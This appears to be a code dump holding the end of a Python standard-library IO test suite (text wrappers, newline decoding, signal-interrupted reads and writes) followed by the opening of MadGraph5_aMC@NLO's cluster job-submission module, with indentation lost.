t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
        # TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
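        # For example, with the usual array('i').itemsize of 4, a 10-byte
        # payload would be truncated to 8 bytes and exposed as a two-item
        # memoryview with format 'i' rather than a plain byte buffer.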
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
@unittest.skipUnless(hasattr(os, "pipe"), "requires os.pipe()")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
        # 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
self.assertIn("Fatal Python error: could not acquire lock "
"for <_io.BufferedWriter name='<{stream_name}>'> "
"at interpreter shutdown, possibly due to "
"daemon threads".format_map(locals()),
err)
else:
self.assertFalse(err.strip('.!'))
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt' or os.name == 'uwp_os', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
# Issue #22331: The test hangs on FreeBSD 7.2
@support.requires_freebsd_version(8)
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
cluster.py
|
################################################################################
# Copyright (c) 2009 The MadGraph5_aMC@NLO Development team and Contributors
#
# This file is a part of the MadGraph5_aMC@NLO project, an application which
# automatically generates Feynman diagrams and matrix elements for arbitrary
# high-energy processes in the Standard Model and beyond.
#
# It is subject to the MadGraph5_aMC@NLO license which should accompany this
# distribution.
#
# For more information, visit madgraph.phys.ucl.ac.be and amcatnlo.web.cern.ch
#
################################################################################
from __future__ import absolute_import
from __future__ import print_function
import subprocess
import logging
import os
import time
import re
import glob
import inspect
import sys
import six
from six.moves import range
from six.moves import input
logger = logging.getLogger('madgraph.cluster')
try:
from madgraph import MadGraph5Error
import madgraph.various.misc as misc
except Exception as error:
if __debug__:
print(str(error))
from internal import MadGraph5Error
import internal.misc as misc
pjoin = os.path.join
class ClusterManagmentError(MadGraph5Error):
pass
class NotImplemented(MadGraph5Error):
pass
multiple_try = misc.multiple_try
pjoin = os.path.join
def check_interupt(error=KeyboardInterrupt):
def deco_interupt(f):
def deco_f_interupt(self, *args, **opt):
try:
return f(self, *args, **opt)
except error:
try:
self.remove(*args, **opt)
except Exception:
pass
raise error
return deco_f_interupt
return deco_interupt
def store_input(arg=''):
def deco_store(f):
def deco_f_store(self, prog, argument=[], cwd=None, stdout=None, stderr=None, log=None,
input_files=[], output_files=[], required_output=[], nb_submit=0):
frame = inspect.currentframe()
args, _, _, values = inspect.getargvalues(frame)
args = dict([(i, values[i]) for i in args if i != 'self'])
id = f(self, **args)
if self.nb_retry > 0:
self.retry_args[id] = args
return id
return deco_f_store
return deco_store
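# Illustrative sketch (an addition, not part of MadGraph): how @store_input()
# records the call arguments of submit2() so that check_termination() can later
# resubmit a failed job with exactly the same parameters. 'DummyCluster',
# './run.sh' and the fake id scheme are hypothetical.
def _store_input_sketch():
    class DummyCluster(Cluster):
        def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
                   log=None, required_output=[], nb_submit=0):
            return len(self.submitted_ids) + 1   # fake cluster id
    mycluster = DummyCluster(cluster_nb_retry=2)
    job_id = mycluster.submit2('./run.sh', argument=['0', 'G1'])
    # nb_retry > 0, so the decorator stored every argument of the call:
    assert mycluster.retry_args[job_id]['argument'] == ['0', 'G1']
    return mycluster.retry_args[job_id]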
def need_transfer(options):
""" This function checks whether compression of input files are necessary
given the running options given. """
if options['run_mode'] != 1 and options['cluster_temp_path'] is None:
return False
else:
return True
class Cluster(object):
"""Basic Class for all cluster type submission"""
name = 'mother class'
identifier_length = 14
def __init__(self,*args, **opts):
"""Init the cluster"""
self.submitted = 0
self.submitted_ids = []
self.finish = 0
self.submitted_dirs = [] #HTCaaS
self.submitted_exes = [] #HTCaaS
self.submitted_args = [] #HTCaaS
if 'cluster_queue' in opts:
self.cluster_queue = opts['cluster_queue']
else:
self.cluster_queue = 'madgraph'
if 'cluster_temp_path' in opts:
self.temp_dir = opts['cluster_temp_path']
else:
self.temp_dir = None
self.options = {'cluster_status_update': (600, 30)}
for key,value in opts.items():
self.options[key] = value
self.nb_retry = opts['cluster_nb_retry'] if 'cluster_nb_retry' in opts else 0
self.cluster_retry_wait = float(opts['cluster_retry_wait']) if 'cluster_retry_wait' in opts else 300
self.retry_args = {}
        # controlling jobs in controlled-type submission
self.packet = {}
self.id_to_packet = {}
def submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, required_output=[], nb_submit=0):
"""How to make one submission. Return status id on the cluster."""
raise NotImplemented('No implementation of how to submit a job to cluster \'%s\'' % self.name)
@store_input()
def submit2(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0):
"""How to make one submission. Return status id on the cluster.
NO SHARE DISK"""
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
if not required_output and output_files:
required_output = output_files
if not hasattr(self, 'temp_dir') or not self.temp_dir or \
(input_files == [] == output_files):
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if not input_files and not output_files:
# not input/output so not using submit2
return self.submit(prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
if cwd is None:
cwd = os.getcwd()
if not os.path.exists(prog):
prog = os.path.join(cwd, prog)
temp_file_name = "sub." + os.path.basename(prog) + '.'.join(argument)
text = """#!/bin/bash
MYTMP=%(tmpdir)s/run$%(job_id)s
MYPWD=%(cwd)s
mkdir -p $MYTMP
cd $MYPWD
input_files=( %(input_files)s )
for i in ${input_files[@]}
do
cp -R -L $i $MYTMP
done
cd $MYTMP
echo '%(arguments)s' > arguments
chmod +x ./%(script)s
%(program)s ./%(script)s %(arguments)s
exit=$?
output_files=( %(output_files)s )
for i in ${output_files[@]}
do
cp -r $MYTMP/$i $MYPWD
done
# if [ "$exit" -eq "0" ]
# then
rm -rf $MYTMP
# fi
"""
dico = {'tmpdir' : self.temp_dir, 'script': os.path.basename(prog),
'cwd': cwd, 'job_id': self.job_id,
'input_files': ' '.join(input_files + [prog]),
'output_files': ' '.join(output_files),
'arguments': ' '.join([str(a) for a in argument]),
'program': ' ' if '.py' in prog else 'bash'}
# writing a new script for the submission
new_prog = pjoin(cwd, temp_file_name)
open(new_prog, 'w').write(text % dico)
misc.Popen(['chmod','+x',new_prog],cwd=cwd)
return self.submit(new_prog, argument, cwd, stdout, stderr, log,
required_output=required_output, nb_submit=nb_submit)
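    # Illustrative example (hypothetical values): with cluster_temp_path='/scratch',
    # prog='madevent', argument=['2', 'G1'] and a Condor back-end (job_id='CONDOR_ID'),
    # the wrapper written above would start with
    #   MYTMP=/scratch/run$CONDOR_ID
    #   MYPWD=/path/to/SubProcesses/P0_gg_ttx
    # copy the input files (plus 'madevent' itself) into $MYTMP, run
    # 'bash ./madevent 2 G1' there, and copy the declared output files back to
    # $MYPWD before removing the scratch directory.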
def cluster_submit(self, prog, argument=[], cwd=None, stdout=None, stderr=None,
log=None, input_files=[], output_files=[], required_output=[],
nb_submit=0, packet_member=None):
"""This function wrap the cluster submition with cluster independant
method should not be overwritten (but for DAG type submission)"""
id = self.submit2(prog, argument, cwd, stdout, stderr, log, input_files,
output_files, required_output, nb_submit)
if not packet_member:
